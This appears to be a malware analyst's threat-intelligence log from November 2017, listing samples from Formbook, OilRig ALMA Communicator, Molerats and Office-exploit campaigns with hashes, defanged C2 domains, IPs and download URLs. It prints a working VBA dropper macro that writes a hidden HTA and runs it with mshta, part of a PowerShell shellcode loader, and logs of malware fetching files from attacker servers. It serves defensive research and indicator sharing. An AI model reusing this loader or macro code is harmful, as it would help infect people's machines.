$UnfMZagns = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ifYFpvaR kernel32.dll CreateThread), (XVu @([IntPtr], [UInt32], [IntPtr], [IntPtr], [UInt32], [IntPtr]) ([IntPtr]))).Invoke([IntPtr]::Zero,0,$keZCpVPaC,[IntPtr]::Zero,0,[IntPtr]::Zero)

[System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer((ifYFpvaR kernel32.dll WaitForSingleObject), (XVu @([IntPtr], [Int32]))).Invoke($UnfMZagns,0xffffffff) | Out-Null

'@

If ([IntPtr]::size -eq 8) {

        start-job { param($QOiYapm) IEX $QOiYapm } -RunAs32 -Argument $diMRMfZk | wait-job | Receive-Job

}

else {

        IEX $diMRMfZk

}

======================================================================


IOCs

=?UTF-8?B?2YXYrdi22LEg2KfYrNiq2YXYp9i5INin2YTZitmI2YUuZG9j?=

zix[.]exe

www.storgemydata[.]website

storgemydata[.]website

www.storgemydata[.]website

5.175.214[.]9

http:///output[.]bmp

http:///update-online/office-update[.]rtf

http://storgemydata.website/v[.]dat

http://storgemydata.website/x[.]exe

https://docs.google[.]com/uc?export=download&confirm=XRlZ&id=0B0dN5Z2GG3wsbGI3eG5pZkVtY0U

https://pastebin[.]com/2cLsuXj6

https://pastebin[.]com/aJwZj2AV

https://pastebin[.]com/u/virtualnote

00b97a49e1208c55e83f7df8e36f9954707e251d

0154d46831a7777be57d2f497167152b130002acae4b9ef0686295cfff441509

1aeb15468663d5823e43b0c175c6d8850e7cf9a6

1cd49a82243eacdd08eee6727375c1ab83e8ecca0e5ab7954c681038e8dd65a1

3627ed71588c7b55b35592c3b277910041f3d5ff917de721c53684ee18fcda40

40f143c4a2bae06d3b91793d0a2c81d2

656f5a3b32f242054dbf30ccb358a0ce

7a1fa34ca804492415579c3ed4f505a7f09fcd7bc834590cff86e2ce77c4fc73

862a9836450a0988bc0f5bd5042392d12d983197f40654c44617a03ff5f2e1d5

8a158271521861e6362ee39710ac833c937ecf2d5cbf4065cb44f3232224cf64

9799e4884d515e821671233e76fdc812

a7ddbe8a7dc013f6127ef685ce48ed16

aa18b8175f68e8eefa12cd2033368bc1b73ff7caf05b405f6ff1e09ef812803c

b3f884fcc36d472b4fbcafaf4303fc0a

b7a06d23d0593b1813be882263e7b96a

ca9c02c35b033f85e5fb2e032710720411a36677

cfe968e4cb1898b268e3dd50810a61a995c56c83096e0b3fb565294967c17f16

d302f794d45c2a6eaaf58ade70a9044e28bc9ec43c9f7a1088a606684b1364b5

d409d26cffe6ce5298956bd65fd604edf9cfa14bc3373a7bdeb47091729f09e9

df5c1082358fa3fd3b7e83c184b1991cc1721be3

e45ca6fa575fa5bfd05c4955114dedaf

ea8786d6e8512faa057be61a4fbcf69917b34bd6

eaa5748de5630d3d1dde0619ed020785e8324486

eff2a0ea43f9146eec6fb71eff35c5f2474fa1f6


2017-11-14: Iranian Order inquiry.doc

Looks generic. “Looks like this is dropping #formbook.”

MD5          : c69a92ffbaccb9d68fa7ba3d48a92c72

SHA1         : e28ffb44bc629cf363bf59c184981cc90c049e14

SHA256       : b7a9837e85cfd6165b724142bc29c6c4b10a26568c3e92767193890374a20266

C2

http://185.24.233.19/2/aplk1.doc

Related

MD5          : a568cd79d9d6dc912b9e905e3bed4eb7

SHA1         : 08fc227f9af27773cc4413927f00997d871532a7

SHA256       : baa93982a2e8fa27bec206fa0c0414afc8d9be5e5f1fe3e2a4db9ba1e2c5bd8c

First name   : Order from Iran and company profile.doc

http://185.24.233.19/2/apfb.doc

Open dir found by @James_inthe_box

https://twitter.com/James_inthe_box/status/930503143300898816

IOCs

Scan043_RFQ..ORDER.doc

0191248b7aa1935a80265ba9f735dd581e7fb194b2eda933bfa775c0fde9a831

199b55f523ee38abd7b65075b0b32aa2572dfda457de7cedfa1031cfb9a72dee

2c58ca3ef1dea4d6bb807dba34d2692594a83b0bb68d50813aeae0237da56c26

2ce0086607f87778efc2af8d99ba87f0fdc10d8c1183e92bc556504defe51f1c

42b124ecd3b66ef033e640adc20e5ad4

572ade15ff7fe58cce2567abefab4f42bcacee6e4cda02501426583f05223512

6bc1f55648f350cfadac1fd042f19f35

8a515d42868882ec909ee42d1ffea6b4b552bcaae7cfc861b08035c55074aa8e

b18a6fdc9ab51130c45c3a6a06c65b5967109d45f11d49d52d7b7dfd459167ed

b7a9837e85cfd6165b724142bc29c6c4b10a26568c3e92767193890374a20266

c40e29dff28640cb6dc91d617a08ada06faf5375

c69a92ffbaccb9d68fa7ba3d48a92c72

ce4e39a592534fb663030e8ced24bb9ef9914146

e28ffb44bc629cf363bf59c184981cc90c049e14

185.24.233[.]19

http://185.24.233.19/2/aplk1[.]doc

http://185.24.233.19/2/aus[.]doc

http://185.24.233.19/2/dp1[.]doc

http://185.24.233.19/2/frnk[.]doc

http://185.24.233.19/2/j1[.]doc

http://185.24.233.19/2/j1[.]doc

http://185.24.233.19/2/j2[.]doc

http://185.24.233.19/2/j3[.]doc

http://185.24.233.19/2/jud[.]doc

http://robusted1020.chickenkiller[.]com/


2017-11-14: ALMA Communicator by Oilrig sample

ALMA Communicator[4]

Submited from NL

MD5        a18cddf2ee9598f384849d9dacd258fa

SHA1        6eef354e75c550d2cae764ef1de13d70dd70c2d7

SHA256 31b1c2415dfb8c2a9b898079e5d4a97200992c25167a0a4dbeed99f966ed6003

Metadata:

Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.3, Code page: 1252, Author: Ubuntu 14.04, Last Saved By: Ubuntu 14.04, Name of Creating Application: Microsoft Excel, Create Time/Date: Tue Oct 31 14:46:39 2017, Last Saved Time/Date: Tue Oct 31 16:38:19 2017, Security: 0

Lure:
COMPATIBILITY WARNING For viewing the content please press the above "Enable Content" button.This document was created by a newer version of microsoft office.This document is incompatible with current version of office.<

Macro

==============================================================================

Option Explicit

Sub ALMA_XLS_Init()

    Dim CellData, htaRun

    Dim AllData

    AllData = ""

    CellData = ""

    htaRun = ""

    Dim Row

    Dim Col

    Dim fso, wss

    Dim HTAFile

    For Row = 200 To 230 Step 1

        For Col = 1 To 251 Step 1

          CellData = ActiveWorkbook.Worksheets("Incompatible").Cells(Row, Col)

          If Not IsNull(CellData) Then

            AllData = AllData & CellData

          End If

        Next

    Next

    If Not IsNull(AllData) Then

        Dim HtaPth

         Set wss = CreateObject("WScript.Shell")

         HtaPth = wss.ExpandEnvironmentStrings("%PUBLIC%") & "\tmp.hta"

        Set fso = CreateObject("Scripting.FileSystemObject")

        Set HTAFile = fso.CreateTextFile(HtaPth)

        HTAFile.Write (AllData)

        HTAFile.Close

         htaRun = "mshta.exe " & HtaPth

         wss.Run htaRun, 0, True

         If fso.FileExists(HtaPth) Then

            fso.DeleteFile HtaPth

         End If

        Set fso = Nothing

    End If

End Sub

Private Sub Workbook_Open()

    Call ALMA_XLS_ShowHide

    Call ALMA_XLS_Init

End Sub

Sub ALMA_XLS_ShowHide()

    If ActiveWorkbook.Worksheets("Incompatible").Visible Then

        Dim WS_Count As Integer

        Dim I As Integer

        WS_Count = ActiveWorkbook.Worksheets.Count

        For I = 1 To WS_Count

            ActiveWorkbook.Worksheets(I).Visible = True

        Next I

        ActiveWorkbook.Worksheets("Incompatible").Visible = False

        ActiveWorkbook.Worksheets("Sheet1").Activate

    End If

End Sub

==============================================================================

Drops

File name        SystemSyncs.exe

Associated Filenames        

C:\Users\Public\{5468973-4973-50726F6A656374-414C4D412E-2}\SystemSyncs.exe

File Size        99328 bytes

File Type        PE32 executable (GUI) Intel 80386, for MS Windows

MD5        65756b69b836891195bab91468b4c3cb

SHA1        1699d5c037e07b31b8faad1c52626b1dcaf2cf51

SHA256        2fc7810a316863a5a5076bf3078ac6fad246bc8773a5fb835e0993609e5bb62e

Config

file similar to known one:

IOCs

prosalar.com

Conect.aspx


2017-11-14: Molerats Dustysky activity

Pivoting from this tweet:

https://twitter.com/blu3_team/status/929852327837696000

IOCs

Filename

f35e10f9bda03e53d3e00a4ba32f352ccf36b3b09e373e32e29504345aaed196.exe[.]bin

Filename

segnali_dal_futuro (2)[.]txt

Filename

ZitipINmI2KfYudmE2KfZhiDYr9it2YTYp9mGINix2KbZitiz2Kcg2YTZgdmE2LPYt9mK2YYuZG9jeC5zY3I=?=

Filename

تسريب خطة احتلال غزة.docx[.]exe

Filename

خطة الرئيس عباس للتعامل مع الامور في قطاع غزة.pdf[.]scr

Domain

checktest.www1[.]biz

Domain

fulltest.yourtrap[.]com

Domain

space.support-reg[.]space

Domain

supports.mefound[.]com

Domain

wiknet.mooo[.]com

Domain

wiknet.wikaba[.]com

Domain

www.supports.mefound[.]com

Hash

05854d1475cfbbcca799b3b1d03fd5af

Hash

0970aec05937e51a52463a7360b4c8b3

Hash

0a777b0b981df907e42b277c2ae6da0d68539781dfdbb256ea4c41a5b7a9996e

Hash

0dda541139a85bd4caaa58110c2bdfbd9547fa8b

Hash

0ea8f665f5e2d20e6a6e852c57264193

Hash

0f0a9724abaaf0f7ab9a55b136212f757f9929319b64314550ca594d87c8c255

Hash

15d390626fea8d06adc261e0588ec40d17b6a62a2320313073ba94809c5e0f4d

Hash

17fbc98aa216bee93a14fddefedce3563a1b41095ea32fff0f0de6b86854a11f

Hash

1c64b27a58b016a966c654f1fdf4c155

Hash

1f2f306d6c55305bf5ab2d4b69e9acc481fdb7b5

Hash

202d1d51254eb13c64d143c387a87c5e7ce97ba3dcfd12dd202a640439a9ea3b

Hash

211caa67fa9fff89ba719cb0b711e4c86bf9ac2926bd4413bcb1106b326b4672

Hash

23370b0c977d7e3f114ee6152a4642b5

Hash

2a7e0463c7814465f9a78355c4754d0a

Hash

2b6bd6f99c913cd895891114bef55bdd

Hash

3ff45e700338eaa3f6704ec30d9552a605c92132

Hash

486954967e02a2e1577bd7dd91026102

Hash

4af094cd8704149d810175a192fcb1b6ea39c77085c7cf4535c03061bf7577a8

Hash

505c98fdc2e8d6ef7cc317339f48003b5523c04e

Hash

5d5b2ed283af4c9c96bc05c566bf5063

Hash

5da48e60c61a7f16e69f8163df76fac3

Hash

62969b6cd78d9da829ccd3f8410cc794b3b57fea

Hash

6c81f73fb99c56b90548b9769ab6a747

Hash

6dc73f2b635019724353b251f1b6f849

Hash

70dde32a57ac2e92c35d35ff9544010170e10ea914c14e7f6a45d4a0f1b4cb0b

Hash

760ace17ad8aacd23699682600bd7ee319d617dc225b87aa873ad92ef5abcb24

Hash

8ed0273baea21de2361eaede7b9ed6fd7080cdef

Hash

970bed241c3382c09ded9f0661f955232b97fb58

Hash

a9dd94f3f0eb23b4d8b030ad758e49c9

Hash

b726fe42c5b6c80b4f10d3542507340f

Hash

b8d5d8e79f1f83548f1efef7f53606da

Hash

bb161c7a01d218ee0cc98b4d5404d460

Hash

c34888f50bd1fc09b70fd5e0fbc333be9d8f0ad998221ce4fbd4cb2cc0b78f6b

Hash

c3c8e5346e084b99cbaa69e3586af35d29612e94

Hash

c3f5f5bfe39b55ffe0343950e0a4bf0433c35679a01daf07ce6c0ccc7d4da9b7

Hash

c44e13c75dff157604934ca4d1e792b4250f7e0e9206f00e7ff367d62763d6aa

Hash

c9a0e0c04b27276fcce552cf175b2c82

Hash

ca00fa8110d567d5b09337d87c67bc8b6ee2db9b

Hash

cda07b55beacf4a97fc310ea2d7b4e2f33d252c3

Hash

cfac5b53db9024a80be5d0c13290f62a

Hash

dd43ba370d10caa673ffdc55a265ed4a997681a0049a5ac38539f11e252a5cfb

Hash

e32e8d881fdd250a2f72002afbbdb9b03d02953f64d21b287715b60590ccefe2

Hash

e9bb52b4b24393e00bcda074d8d323f3fc5570bd

Hash

ea406ea60a05afa14f7debc67a75a472

Hash

ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a

Hash

f24a18fa29af2c2213c3f2728e0ddff141d1d5d9

Hash

fb5c44f5736d2bd14cf7b5702af346fe08fd778db418a827256c01de2c16ca97

IP

104.200.67[.]190


2017-11-13: “11092017.ppsx”

ebff3cdf34d4df6341d12a400169a5bd27ee3bf9c62276b00b01904c1d749c23

2d61843bea61af94add72ea6e9517933122d96a0

a08b9b8f0d09f293c731b122648579d3

9a42f42ca73620c3258faab06666446c
BL.exe

https://www.reverse.it/sample/75e67dab3ce2db8e20dd866125667dfed7e8e0289ab25fc2012e30cbe0ada999?environmentId=100 


2017-11-13  “20171101 0226 atmsScherer_1.doc”

MD5          : 76191048a30b395461449266d13c3d33

SHA1         : 584c7631758b98f7d33a95128bc9bfe77907fb8d

SHA256       : f6fbd0edcf8ab32e3b16053012d28e60523544ac9a1bfbdea0eca7eb0a23eceb

Type         : Rich Text Format

First seen   : 2017-11-08 09:11:14 UTC

Last seen    : 2017-11-08 09:11:14 UTC

First name   : 20171101 0226 atmsScherer_1.doc

First country: AT

CVE-2017-0199

IOCs

188.209.52[.]29

http://188.209.52[.]29/sand/c.xls


2017-11-13 “Saudi Arabia's 'Game of Thobes'.doc׳”

MD5 aede654e77e92dbd77ca512e19f495b8

SHA1 d9fac68b6c49c485675d9141f375799d10572999

SHA256 aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3

Exploit.CVE-2017-11826

Submitted from: Turkey

https://www.hybrid-analysis.com/sample/aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3?environmentId=100 

GETs files from a webserver

"GET /articles/937933.html

Host: 45.76.36.243

"GET /articles/937934.html

Host: 45.76.36.243

"GET /articles/937935.html

Host: 45.76.36.243

"GET /articles/937936.html

Host: 45.76.36.243

"GET /articles/937937.html

Drops
Filepath

%TEMP%\vcpkgs.exe

95KiB (97280 bytes)

b76f4c8c22b84600ac3cff64dadfaf8b

78c0266456e33abed00895cb05d0f9fe09b83da3

5ae0a582ed5d60324d6d1397be3deb0c704a1d77c9ef3d5f486455f99da32e7f

Sophos AV: Troj/Orcim-A

Campaign IOCs

Filename

00007AA8[.]ex_

Filename

Saudi Arabia's 'Game of Thobes'[.]doc

Domain

saudiedi.toh[.]info

Hash

5ae0a582ed5d60324d6d1397be3deb0c704a1d77c9ef3d5f486455f99da32e7f

Hash

78c0266456e33abed00895cb05d0f9fe09b83da3

Hash

a1047665ed9d665f5cf066e4a9902d809e7325cf

Hash

ade199b16607fd29c8e7288fb750ca2b

Hash

aed93c002574f25dabd1859f080203a2c8f332e92c80db9aa983316695d938d3

Hash

aede654e77e92dbd77ca512e19f495b8

Hash

b76f4c8c22b84600ac3cff64dadfaf8b

Hash

b76f4c8c22b84600ac3cff64dadfaf8b

Hash

b76f4c8c22b84600ac3cff64dadfaf8b

Hash

d5b22843aabbbc20af253d579fd1f098138be85e2cff4677f7886e8d31ff00cb

Hash

d9fac68b6c49c485675d9141f375799d10572999

IP

45.76.106[.]149

IP

45.76.36[.]243

URL

/articles/937933[.]html

URL

/articles/937934[.]html

URL

/articles/937935[.]html

URL

/articles/937936[.]html

URL

/articles/937937[.]html

URL

/articles/937938[.]html

URL

/search?q=XXX&cvid=XXXXXXXXXXXXXXXXXXX

URL

/search?q=XXXX&cvid=XXXXXXXXXXXXXXXXXX

URL

saudiedi.toh[.]info/search?q=%E7%DF%5D%10&cvid=714105926300154928

Related:

MD5          : fea6546e3299a31a58a3aa2a6b7060c9

SHA1         : eddf2ca780b4396c0bf5ea3f13d22275fb6822fc

SHA256       : 26c672b2537f8a89f2d59674f00bcfe9825796ca9b1ec51c96e5675dd586b87b

Type         : Rich Text Format

First seen   : 2017-11-09 11:55:24 UTC

Last seen    : 2017-11-09 11:55:24 UTC

First country: TR

CVE-2017-11826

8598313222c41280eb42863eda8a9490

256c631372692a1a907b04d27a735eb0905a003e

50eedaf3150253cc2298446615421f4caa0482cb93658dc095855c38d425e3fb

8c81eb0fb49c40a1fa5474f45ff638961330ff73198dc7d537667455e5273bb8

26c672b2537f8a89f2d59674f00bcfe9825796ca9b1ec51c96e5675dd586b87b

eddf2ca780b4396c0bf5ea3f13d22275fb6822fc

fea6546e3299a31a58a3aa2a6b7060c9

Package

~WRO0000.doc

=?UTF-8?Q?=C4=B0=C5=9Fte_piyasadaki_en_iyi_ak=C4=B1ls=C4=B1z_telefonlar=2Edoc?=


[1] https://twitter.com/anyrun_app/status/1219131318237323265

[2] The Jewish Journal of Greater Los Angeles is an independent, nonprofit community weekly newspaper serving the Jewish community of greater Los Angeles, published by TRIBE Media Corp. The Journal was established in 1985
https://en.wikipedia.org/wiki/The_Jewish_Journal_of_Greater_Los_Angeles 

[3] https://en.wikipedia.org/wiki/Deutsche_Welle 

[4] https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/